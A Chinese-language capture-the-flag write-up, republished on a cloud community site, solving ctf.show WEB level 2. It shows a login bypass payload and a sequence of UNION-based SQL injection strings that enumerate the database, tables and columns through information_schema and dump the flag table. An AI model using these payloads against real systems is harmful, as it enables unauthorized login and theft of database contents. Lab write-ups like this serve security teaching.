ctfshow-WEB-web2

举报
士别三日wyx 发表于 2021/12/23 01:43:01 2021/12/23
【摘要】 ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可     在用户名的输入框中输入万能账号 a' or true #,密码随便输  登录成功,万能账号生效...

ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可

 

 

在用户名的输入框中输入万能账号 a' or true #,密码随便输

 登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库

 

首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输

a' union select 1,2,3 #
 

 

 

接下来,我们修改payload中2的位置,就可以将数据回显到页面中了,下面获取当前使用的数据库,盲猜flag就藏在当前使用的数据库中

a' union select 1,database(),3 #
 

 

数据库有了,接下来是脱表,在用户名的输入框中输入一下payload,密码还是随便输


      a' union select 1,
      (select group_concat(table_name) from information_schema.tables
      where table_schema='web2')
      ,3 #
  
 

 

接下来获取flag表的字段


      a' union select 1,
      (select group_concat(column_name) from information_schema.columns
      where table_schema='web2' and table_name='flag')
      ,3 #
  
 

 

接下来获取flag表的数据

a' union select 1,(select flag from flag),3 #
 

将flag的内容整体复制到输入框中即可过关 

文章来源: blog.csdn.net,作者:士别三日wyx,版权归原作者所有,如需转载,请联系作者。

原文链接:blog.csdn.net/wangyuxiang946/article/details/119803269

【版权声明】本文为华为云社区用户转载文章,如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。